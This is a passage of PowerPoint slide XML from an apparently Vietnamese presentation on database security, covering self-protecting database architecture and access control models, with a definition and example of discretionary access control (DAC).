          <a:xfrm>
            <a:off x="1257302" y="4604825"/>
            <a:ext cx="8877297" cy="3200876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ử dụng các chính sách nhúng vào chính cơ sở dữ liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ho phép các chính sách này chặn mọi nỗ lực thỏa hiệp trạng thái của cơ sở dữ liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>oặc thay đổi cấu hình của nó theo với những gì đã được chủ sở hữu hệ thống thiết lập </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ban đầu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7CE1E80-53DB-2DC7-4FA4-36EB9B723619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11353800" y="9561918"/>
            <a:ext cx="5275006" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kiến trúc của cơ sở dữ liệu tự bảo vệ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77366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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="22" presetClass="entr" presetSubtype="4" fill="hold"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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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down)">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1" grpId="0"/>
      <p:bldP spid="6" grpId="0"/>
      <p:bldP spid="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70265E-A1DF-0CF5-EB13-B42B0567F58F}"/>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C5CED4E2-EDAC-437A-620D-76E5FDB5ECD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699680" y="-1470403"/>
            <a:ext cx="14026196" cy="11628992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14026196" h="11628992">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14026196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14026196" y="11628992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116289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2" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4111FF6D-251C-F895-C27F-5BC83C7B9742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C011F023-F498-3E72-FD99-7B867BDDC8AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742951" y="2698265"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42F3A374-1526-FEE2-64DA-A09F68BB2C82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F8FBB3B-3E67-E249-C289-7C2C035C473F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24661D22-8A37-F4F0-B13C-998CDB4C8866}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2915208"/>
            <a:ext cx="6096000" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ô hình kiểm soát truy cập</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A0FB8ED-4AC2-20E6-D0A3-D932529EFC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11158728" y="3577107"/>
            <a:ext cx="5811975" cy="5429416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F5EB685-3F5B-B05F-6BF0-B20A1DD4F6DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3577107"/>
            <a:ext cx="9863328" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. Mô hình kiểm soát truy cập tùy quyền (DAC)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:effectLst/>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FE55106E-8D15-8AA4-AB8D-51AD76DF887E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1317297" y="4322339"/>
            <a:ext cx="9841431" cy="3400931"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ho phép cấp hoặc hạn chế quyền truy cập đối tượng thông qua chính sách truy cập được xác định bởi nhóm chủ sở hữu hoặc chủ thể của đối tượng. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Một </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>báo cáo nhỏ về dự án cụ thể có thể có </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>chủ sở hữu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>là </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>trưởng nhóm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dự án. Anh ta có thể quyết định chia sẻ tài liệu này với các thành viên khác trong nhóm, nhưng không chia sẻ nó cho những người không liên quan đến dự án.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3308195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par>
                                <p:cTn id="8" presetID="6" presetClass="entr" presetSubtype="16"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circle(in)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="6" presetClass="entr" presetSubtype="16"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circle(in)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="6" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="with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circle(in)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="6" presetClass="entr" presetSubtype="16" fill="hold"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circle(in)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="6" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="with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circle(in)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="6" presetClass="entr" presetSubtype="16"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circle(in)">
                                      <p:cBhvr>
                                        <p:cTn id="25"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2" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="5" grpId="0"/>
      <p:bldP spid="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2DEAB0-1B1E-E280-27D6-0E3802FCD14E}"/>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2B620FF9-ACF3-B485-7ACE-E77672F7957B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
